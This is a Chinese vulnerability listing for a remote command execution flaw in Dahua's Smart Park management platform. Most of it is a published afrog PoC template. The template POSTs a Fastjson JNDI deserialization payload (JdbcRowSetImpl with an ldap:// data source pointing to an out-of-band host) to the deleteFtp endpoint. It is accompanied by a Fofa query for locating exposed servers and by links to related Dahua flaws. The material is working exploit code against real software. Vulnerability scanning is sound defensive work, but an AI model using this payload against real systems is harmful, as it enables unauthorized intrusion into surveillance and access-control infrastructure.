dahua-smart-park-deleteftp-rce: 大华智慧园区综合管理平台 deleteFtp 远程命令执行

日期: 2025-09-01 | 影响软件: 大华智慧园区综合管理平台 | POC: 已公开

漏洞描述

大华智慧园区综合管理平台 deleteFtp 接口存在远程命令执行漏洞。 Fofa: body="/WPMS" || body="src=\"/WPMS/asset/common/js/jsencrypt.min.js\""

PoC代码[已公开]

id: dahua-smart-park-deleteftp-rce

info:
  name: 大华智慧园区综合管理平台 deleteFtp 远程命令执行
  author: xy
  severity: critical
  verified: true
  description: |-
    大华智慧园区综合管理平台 deleteFtp 接口存在远程命令执行漏洞。
    Fofa: body="/WPMS" || body="src=\"/WPMS/asset/common/js/jsencrypt.min.js\""
  tags: dahua,rce
  created: 2023/11/28

set:
  oob: oob()
  oobDNS: oob.DNS
rules:
  r0:
    request:
      method: POST
      path: /CardSolution/card/accessControl/swingCardRecord/deleteFtp
      headers:
        Content-Type: application/json
      body: |
        {"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://{{oobDNS}}","autoCommit":true}}}
    expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/dahua-smart-park-deleteftp-rce.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

dahua-smartpark-sql-inject: 大华智慧园区综合管理平台SQL注入 POC

大华智慧园区综合管理平台&大华DSS存在前台任意用户密码重置漏洞 无POC

大华智慧园区综合管理平台 bitmap_findAllMapByUserId.action SQL注入漏洞 无POC

dahua-ipms-rce: 大华智慧园区综合管理平台 ipms 远程代码执行漏洞 POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

大华智慧园区综合管理平台&大华DSS存在前台任意用户密码重置漏洞无POC

大华智慧园区综合管理平台 bitmap_findAllMapByUserId.action SQL注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC